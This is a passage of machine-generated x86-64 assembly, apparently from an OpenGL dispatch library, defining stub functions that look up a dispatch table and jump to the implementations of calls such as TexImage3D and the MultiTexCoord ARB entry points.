call _x86_64_get_dispatch@PLT
movq 2944(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2944(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2944(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2944(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Minmax), .-GL_PREFIX(Minmax)
.p2align 4,,15
.globl GL_PREFIX(ResetHistogram)
.type GL_PREFIX(ResetHistogram), @function
GL_PREFIX(ResetHistogram):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2952(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2952(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2952(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2952(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ResetHistogram), .-GL_PREFIX(ResetHistogram)
.p2align 4,,15
.globl GL_PREFIX(ResetMinmax)
.type GL_PREFIX(ResetMinmax), @function
GL_PREFIX(ResetMinmax):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2960(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2960(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2960(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2960(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ResetMinmax), .-GL_PREFIX(ResetMinmax)
.p2align 4,,15
.globl GL_PREFIX(TexImage3D)
.type GL_PREFIX(TexImage3D), @function
GL_PREFIX(TexImage3D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2968(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2968(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2968(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2968(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexImage3D), .-GL_PREFIX(TexImage3D)
.p2align 4,,15
.globl GL_PREFIX(TexSubImage3D)
.type GL_PREFIX(TexSubImage3D), @function
GL_PREFIX(TexSubImage3D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2976(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2976(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2976(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2976(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexSubImage3D), .-GL_PREFIX(TexSubImage3D)
.p2align 4,,15
.globl GL_PREFIX(CopyTexSubImage3D)
.type GL_PREFIX(CopyTexSubImage3D), @function
GL_PREFIX(CopyTexSubImage3D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2984(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2984(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2984(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2984(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CopyTexSubImage3D), .-GL_PREFIX(CopyTexSubImage3D)
.p2align 4,,15
.globl GL_PREFIX(ActiveTextureARB)
.type GL_PREFIX(ActiveTextureARB), @function
GL_PREFIX(ActiveTextureARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2992(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2992(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2992(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2992(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ActiveTextureARB), .-GL_PREFIX(ActiveTextureARB)
.p2align 4,,15
.globl GL_PREFIX(ClientActiveTextureARB)
.type GL_PREFIX(ClientActiveTextureARB), @function
GL_PREFIX(ClientActiveTextureARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3000(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3000(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3000(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3000(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ClientActiveTextureARB), .-GL_PREFIX(ClientActiveTextureARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord1dARB)
.type GL_PREFIX(MultiTexCoord1dARB), @function
GL_PREFIX(MultiTexCoord1dARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3008(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3008(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3008(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3008(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord1dARB), .-GL_PREFIX(MultiTexCoord1dARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord1dvARB)
.type GL_PREFIX(MultiTexCoord1dvARB), @function
GL_PREFIX(MultiTexCoord1dvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3016(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3016(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3016(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3016(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord1dvARB), .-GL_PREFIX(MultiTexCoord1dvARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord1fARB)
.type GL_PREFIX(MultiTexCoord1fARB), @function
GL_PREFIX(MultiTexCoord1fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3024(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3024(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3024(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3024(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord1fARB), .-GL_PREFIX(MultiTexCoord1fARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord1fvARB)
.type GL_PREFIX(MultiTexCoord1fvARB), @function
GL_PREFIX(MultiTexCoord1fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3032(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3032(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3032(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3032(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord1fvARB), .-GL_PREFIX(MultiTexCoord1fvARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord1iARB)
.type GL_PREFIX(MultiTexCoord1iARB), @function
GL_PREFIX(MultiTexCoord1iARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3040(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3040(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3040(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3040(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord1iARB), .-GL_PREFIX(MultiTexCoord1iARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord1ivARB)
.type GL_PREFIX(MultiTexCoord1ivARB), @function
GL_PREFIX(MultiTexCoord1ivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3048(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3048(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3048(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3048(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord1ivARB), .-GL_PREFIX(MultiTexCoord1ivARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord1sARB)
.type GL_PREFIX(MultiTexCoord1sARB), @function
GL_PREFIX(MultiTexCoord1sARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3056(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3056(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3056(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3056(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord1sARB), .-GL_PREFIX(MultiTexCoord1sARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord1svARB)
.type GL_PREFIX(MultiTexCoord1svARB), @function
GL_PREFIX(MultiTexCoord1svARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3064(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3064(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3064(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3064(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord1svARB), .-GL_PREFIX(MultiTexCoord1svARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord2dARB)
.type GL_PREFIX(MultiTexCoord2dARB), @function
GL_PREFIX(MultiTexCoord2dARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3072(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3072(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3072(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3072(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord2dARB), .-GL_PREFIX(MultiTexCoord2dARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord2dvARB)
.type GL_PREFIX(MultiTexCoord2dvARB), @function
GL_PREFIX(MultiTexCoord2dvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3080(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3080(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3080(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3080(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord2dvARB), .-GL_PREFIX(MultiTexCoord2dvARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord2fARB)
.type GL_PREFIX(MultiTexCoord2fARB), @function
GL_PREFIX(MultiTexCoord2fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3088(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3088(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3088(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3088(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord2fARB), .-GL_PREFIX(MultiTexCoord2fARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord2fvARB)
.type GL_PREFIX(MultiTexCoord2fvARB), @function
GL_PREFIX(MultiTexCoord2fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3096(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3096(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3096(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3096(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord2fvARB), .-GL_PREFIX(MultiTexCoord2fvARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord2iARB)
.type GL_PREFIX(MultiTexCoord2iARB), @function
GL_PREFIX(MultiTexCoord2iARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3104(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3104(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3104(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3104(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord2iARB), .-GL_PREFIX(MultiTexCoord2iARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord2ivARB)
.type GL_PREFIX(MultiTexCoord2ivARB), @function
GL_PREFIX(MultiTexCoord2ivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3112(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3112(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3112(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3112(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord2ivARB), .-GL_PREFIX(MultiTexCoord2ivARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord2sARB)
.type GL_PREFIX(MultiTexCoord2sARB), @function
GL_PREFIX(MultiTexCoord2sARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3120(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3120(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3120(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3120(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord2sARB), .-GL_PREFIX(MultiTexCoord2sARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord2svARB)
.type GL_PREFIX(MultiTexCoord2svARB), @function
GL_PREFIX(MultiTexCoord2svARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3128(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3128(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3128(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3128(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord2svARB), .-GL_PREFIX(MultiTexCoord2svARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord3dARB)
.type GL_PREFIX(MultiTexCoord3dARB), @function
GL_PREFIX(MultiTexCoord3dARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3136(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3136(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3136(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3136(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord3dARB), .-GL_PREFIX(MultiTexCoord3dARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord3dvARB)
.type GL_PREFIX(MultiTexCoord3dvARB), @function
GL_PREFIX(MultiTexCoord3dvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3144(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3144(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3144(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3144(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord3dvARB), .-GL_PREFIX(MultiTexCoord3dvARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord3fARB)
.type GL_PREFIX(MultiTexCoord3fARB), @function
GL_PREFIX(MultiTexCoord3fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3152(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3152(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3152(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3152(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord3fARB), .-GL_PREFIX(MultiTexCoord3fARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord3fvARB)
.type GL_PREFIX(MultiTexCoord3fvARB), @function
GL_PREFIX(MultiTexCoord3fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3160(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3160(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3160(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3160(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord3fvARB), .-GL_PREFIX(MultiTexCoord3fvARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord3iARB)
.type GL_PREFIX(MultiTexCoord3iARB), @function
GL_PREFIX(MultiTexCoord3iARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3168(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3168(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3168(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3168(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord3iARB), .-GL_PREFIX(MultiTexCoord3iARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord3ivARB)
.type GL_PREFIX(MultiTexCoord3ivARB), @function
GL_PREFIX(MultiTexCoord3ivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3176(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3176(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3176(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3176(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord3ivARB), .-GL_PREFIX(MultiTexCoord3ivARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord3sARB)
.type GL_PREFIX(MultiTexCoord3sARB), @function
GL_PREFIX(MultiTexCoord3sARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3184(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3184(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3184(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3184(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord3sARB), .-GL_PREFIX(MultiTexCoord3sARB)
.p2align 4,,15
